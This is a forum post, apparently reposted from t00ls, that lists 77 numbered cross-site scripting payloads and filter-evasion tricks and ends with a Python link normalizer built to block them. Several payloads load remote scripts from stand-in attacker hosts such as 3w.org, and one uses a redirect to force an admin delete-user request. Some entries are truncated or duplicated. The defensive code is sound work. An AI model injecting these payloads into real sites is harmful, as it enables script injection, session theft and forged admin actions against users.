There doesn't seem to be much XSS material on t00ls, so when I saw something good I copied it over; not sure whether any fellow members need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect in China, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, variant 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, variant 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, variant 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript escape-sequence filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (built from an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE variant
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) ActionScript inside Flash can be used to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS gets filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Leaving out [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Leaving out [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
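Every scheme trick above (items 3-19 and 77: mixed case, entity encoding with or without semicolons, embedded tab/newline/CR, NUL bytes, leading control characters) and every host-spelling trick (items 70-76: decimal, hex, octal and mixed IPs, protocol-relative links, trailing dot) defeats a filter that inspects the raw attribute string. This added Python example is not from the cheat sheet or the t00ls post; it normalizes a link value the way a browser does before checking the scheme and canonicalizing the host against an allowlist. The allowlist, the `is_allowed_link` policy and the sample inputs in the test are constructed for the demo.

```python
import html
import ipaddress
import re
from urllib.parse import urlsplit

_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))  # U+0000..U+0020

def normalize(value):
    """Undo what a browser undoes before it looks at the scheme of an attribute URL."""
    s = html.unescape(value)            # &#106; &#x6A &#106 (no ';') -> 'j'   (items 5, 8-10)
    s = s.replace("\0", "")             # NUL inside 'java\0script'             (items 17, 18)
    s = s.strip(_C0_AND_SPACE)          # leading/trailing controls and spaces  (item 19)
    return re.sub(r"[\t\n\r]", "", s)   # tab / LF / CR anywhere in the scheme  (items 11-14)

def scheme_of(value):
    m = re.match(r"([a-z][a-z0-9+.\-]*):", normalize(value), re.I)
    return m.group(1).lower() if m else None   # None: relative URL, no scheme to abuse

def _legacy_ipv4(host):
    """Decimal, hex, octal or mixed dotted forms (items 70-73) -> dotted quad, else None."""
    nums = []
    for part in host.split("."):
        if re.fullmatch(r"0x[0-9a-f]+", part):
            nums.append(int(part, 16))
        elif re.fullmatch(r"0[0-7]*", part):
            nums.append(int(part, 8))
        elif re.fullmatch(r"[1-9][0-9]*", part):
            nums.append(int(part))
        else:
            return None
    *head, last = nums                  # the last part fills all remaining bytes
    if len(nums) > 4 or any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    return str(ipaddress.IPv4Address(sum(n << (8 * (3 - i)) for i, n in enumerate(head)) + last))

def canonical_host(value):
    s = normalize(value)
    if s.startswith("//"):
        s = "http:" + s                 # protocol-relative (item 74) still names a host
    host = (urlsplit(s).hostname or "").lower().rstrip(".")   # trailing dot (item 76)
    return _legacy_ipv4(host) or host or None

def is_allowed_link(value, allowed_hosts):
    """Reject javascript:/vbscript:/data: links, then require a known host for absolute ones."""
    if scheme_of(value) not in (None, "http", "https"):
        return False
    host = canonical_host(value)
    return host is None or host in allowed_hosts   # relative links pass, absolute need allowlist
```

Compare hosts only after `canonical_host`, never on the raw string, or items 70-76 all slip past a name-based allowlist.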